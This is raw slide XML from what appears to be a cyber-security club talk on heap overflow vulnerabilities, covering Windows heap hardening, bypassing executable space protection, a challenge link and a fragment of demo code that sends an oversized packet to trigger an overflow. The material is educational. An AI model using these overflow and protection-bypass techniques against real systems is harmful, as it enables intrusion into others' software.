          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>connection</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>register_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>connection</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>oversized_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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45" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843280" y="1329840"/>
            <a:ext cx="6181200" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38160">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487080" y="3668040"/>
            <a:ext cx="11217600" cy="742320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581120" y="453240"/>
            <a:ext cx="9743760" cy="504360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Bypassing executable space protection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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8" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="887040" y="1962000"/>
            <a:ext cx="10590120" cy="4057200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Lookaside lists replaced by Low Fragmentation Heap (LFH)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Heap entry metadata randomization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Heap cookie checking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Randomized heap base address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Function pointer encoding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Termination on heap corruption (if enabled)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Algorithm variation depending on allocation patterns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0099cc"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>https://blogs.technet.microsoft.com/srd/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="514440"/>
            <a:ext cx="11245320" cy="867960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Heap overflow vulnerabilities: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>                     Windows Vista/Server 2008/7 heap hardening</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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3" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2524320"/>
            <a:ext cx="8309880" cy="1015560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>HEAP OVERFLOW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>VULNERABILITIES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10725480" y="6488640"/>
            <a:ext cx="1400400" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="bfbfbf"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sofia 2018</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9828720" y="6119280"/>
            <a:ext cx="2262960" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="bfbfbf"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Joachim De Zutter</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50" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062840" y="700200"/>
            <a:ext cx="3952440" cy="5095440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614520" y="4958280"/>
            <a:ext cx="6352920" cy="1376280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0099cc"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>https://github.com/JDeZutter/CyberSecurityClub/blob/master/letitsnow.txt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="419040"/>
            <a:ext cx="10286640" cy="561600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Challenge</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7058160" y="700200"/>
            <a:ext cx="3952440" cy="5095440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="40444a"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="007196"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="554" name="Online Media 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352600" y="1776960"/>
            <a:ext cx="3047760" cy="2285640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="555" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1747800" y="1190520"/>
            <a:ext cx="4257360" cy="3952440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:transition>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6" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286160" y="2539440"/>
            <a:ext cx="4114440" cy="1735560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>THANK YOU</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>
    <p:fade/>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996633"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5441760" y="2598120"/>
            <a:ext cx="8024400" cy="506520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Stack overflows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5441760" y="3318120"/>
            <a:ext cx="8024400" cy="569520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Heap overflows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5508360" y="4162680"/>
            <a:ext cx="8024400" cy="514080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Demo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5441760" y="4945680"/>
            <a:ext cx="8024400" cy="491760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Next topic: reverse engineering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4968000" y="2598120"/>
            <a:ext cx="401760" cy="401760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fa6e1e"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4968000" y="3402000"/>
            <a:ext cx="401760" cy="401760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fa6e1e"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4968000" y="4218840"/>
            <a:ext cx="401760" cy="401760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fa6e1e"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4968000" y="5035680"/>
            <a:ext cx="401760" cy="401760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fa6e1e"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4066920" cy="6857640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="bfbfbf"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="b9b9b9"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="TextShape 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379080" y="424440"/>
            <a:ext cx="3475080" cy="1620720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1693"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>AGENDA</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6" name="TextShape 1"/>
